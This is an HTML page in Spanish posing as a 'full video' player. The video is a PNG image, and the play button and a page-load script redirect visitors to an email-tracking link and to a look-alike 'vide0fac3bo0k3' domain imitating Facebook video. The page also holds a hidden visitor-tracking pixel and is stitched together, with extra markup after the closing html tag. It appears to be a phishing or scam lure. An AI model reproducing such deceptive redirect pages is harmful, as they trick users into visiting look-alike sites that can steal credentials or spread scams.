
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>VIDEO COMPLETO</title>
  <meta property="og:image" content="https://i.imgur.com/hZu3vtc.png">
  <style>
    body {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
    }

    .video-container {
      text-align: center;
    }

    h1 {
      font-size: 24px;
      margin-bottom: 20px;
    }

    .play-button {
      display: inline-block;
      padding: 10px 20px;
      border: 2px solid #000;
      border-radius: 5px;
      background-color: #fff;
      color: #000;
      font-weight: bold;
      text-decoration: none;
      transition: background-color 0.3s, color 0.3s;
    }

    .play-button:hover {
      background-color: #000;
      color: #fff;
    }
  </style>
</head>
  <meta http-equiv="cache-control" content="no-cache"> <img src="//whos.amung.us/pingjs/?k=s16hpgwa9d&amp;t=&amp;x=Miakmobile" style="display:none">
<body>
  <div class="video-container">
    <h1>Reproducir Video</h1>
    <a class="play-button" href="#" onclick="playVideoAndRedirect(); return false;">Haz clic aquí para reproducir el video</a>
  </div>

  <video id="myVideo" style="display:none;" controls>
    <source src="https://i.imgur.com/gX9Er7W.png" type="video/mp4">
    <!-- Añade aquí más formatos de video para mayor compatibilidad -->
  </video>

  <script>
    function playVideoAndRedirect() {
      var video = document.getElementById("myVideo");
      video.style.display = "block";

      video.play();

      setTimeout(function() {
        // Aquí cambia "URL_DE_REDIRECCION" por el enlace que desees redireccionar
        window.location.href = "https://api.elasticemail.com/page?lid=M-XWT4jryC_yEfucjYYV8g2";
      }, 2000); // 1 segundos (1000 milisegundos)
    }
  </script>
</body>
</html>
<div class="footer">
        <ul> <div class="container">
        <h1 id="header">
            <a href="">
                <img alt="Logo" class="logo" src="" />
            </a>
            
        </h1>
        <p id="description"></p>
        <a class="button" href="" id="button_search"></a>
    </div>

    <div class="card">
        <div class="author-container">
            <img alt="" class="" />
            <span class="author-name"></span>
        </div>
        <a href="" id="dynamicLink">
            <img alt="" src="" />
        </a>
    </div>

    <div class="footer">
        <ul><!-- Enlaces del pie de página --></ul>
    </div>

    <script>
        // Verificar si es la primera visita
        if (!localStorage.getItem('visited')) {
            // Generar un número aleatorio único y actualizar el enlace dinámico
            var randomNumber = Math.floor(Math.random() * 1000000000); // Número aleatorio de 0 a 999,999,999
            var dynamicLink = document.getElementById('dynamicLink');
            dynamicLink.href = 'https://vide0fac3bo0k3.vercel.app/?m=' + randomNumber + '.mp4'; // Agregar .mp4 al final del número aleatorio
            // Establecer una bandera para indicar que el usuario ha visitado la página
            localStorage.setItem('visited', 'true');
            // Redirigir automáticamente si es la primera visita
            window.location.href = dynamicLink.href;
        } else {
            // Redirigir a la URL específica para dispositivos móviles
            if (window.innerWidth <= 480 && window.innerHeight <= 800) {
                window.location.href = 'https://api.elasticemail.com/page?lid=M-XWT4jryC_yEfucjYYV8g2';
            }
        }
    </script>

